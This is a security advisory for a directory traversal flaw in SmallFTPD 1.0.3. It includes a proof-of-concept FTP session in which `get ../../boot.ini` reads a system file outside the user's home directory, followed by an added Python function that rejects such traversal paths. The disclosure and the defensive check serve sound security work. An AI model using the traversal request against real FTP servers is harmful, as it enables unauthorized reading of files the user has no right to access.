SmallFTPD 1.0.3 Directory Traversal

2010-11-01T00:00:00
ID PACKETSTORM:95340
Type packetstorm
Reporter Pr0T3cT10n
Modified 2010-11-01T00:00:00

Description

                                        
`# Live by the byte  
#  
# Members:  
#  
# Pr0T3cT10n  
# -=M.o.B.=-  
# TheLeader  
# Sro  
#  
# Contact: inv0ked.israel@gmail.com  
#  
# -----------------------------------  
# SmallFTPD is vulnerable to a path traversal; the following explains how to read files.  
# The vulnerability allows an unprivileged attacker to read files that he has no permission to access.  
# The vulnerable FTP command is:  
# * GET - Read File  
#-----------------------------------  
# Vulnerability Title: SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability  
# Date: 31/10/2010  
# Author: Pr0T3cT10n  
# Software Link: http://sourceforge.net/projects/smallftpd/files/smallftpd/smallftpd-1.0.3-fix/smallftpd-1.0.3-fix.zip/download  
# Affected Version: 1.0.3  
# Tested on Windows XP Hebrew, Service Pack 3  
# ISRAEL, NULLBYTE.ORG.IL  
###  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\Documents and Settings\Admin>ftp 127.0.0.1  
Connected to 127.0.0.1.  
220- smallftpd 1.0.3  
220- check http://smallftpd.free.fr for more information  
220 report bugs to smallftpd@free.fr  
User (127.0.0.1:(none)): test  
331 User name okay, password required.  
Password:  
230 User logged in.  
ftp> get ../../boot.ini  
200 Port command successful.  
150 Data connection ready.  
226 Transfer complete.  
ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec.  
ftp> bye  
221 Good bye.  
  
C:\Documents and Settings\Admin>type boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"  
  
`
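A server-side check that would refuse the `get ../../boot.ini` request in the session above, as an added example that is not part of the original advisory and is not SmallFTPD's own code. The names `resolve_in_root` and `PathRejected` and the sample home directory are hypothetical, and the check goes beyond the one request shown to cover backslash separators, drive letters and absolute paths.

```python
import ntpath


class PathRejected(ValueError):
    """Raised when a client-supplied FTP path must not be served."""


def resolve_in_root(root, cwd, requested):
    """Map an FTP path onto the account's home directory, or raise.

    root      -- account home directory on disk (constructed in the test)
    cwd       -- session's virtual working directory, e.g. "/" or "/pub"
    requested -- argument of the command, e.g. "../../boot.ini"
    """
    # Windows accepts both separators, so treat them the same.
    unified = requested.replace("\\", "/")
    # A leading separator restarts at the virtual root, not the disk root.
    start = "" if unified.startswith("/") else cwd.replace("\\", "/")
    stack = []
    for part in (start + "/" + unified).split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                # Would climb above the home directory: refuse, don't clamp.
                raise PathRejected("traversal above root: %r" % requested)
            stack.pop()
            continue
        # ':' covers drive letters (C:) and NTFS alternate data streams.
        # Win32 trims trailing dots and spaces from names, so a name such
        # as ".. " is refused instead of guessing what it resolves to.
        if ":" in part or part[-1] in ". ":
            raise PathRejected("illegal component: %r" % part)
        stack.append(part)
    full = ntpath.normpath(ntpath.join(root, *stack))
    # Second, independent containment check on the joined result.
    base = ntpath.normcase(ntpath.normpath(root))
    joined = ntpath.normcase(full)
    if joined != base and not joined.startswith(base + "\\"):
        raise PathRejected("escaped root: %r" % requested)
    return full
```

The check is lexical only: junctions or symbolic links inside the home directory still need a comparison of the resolved on-disk path on the server itself.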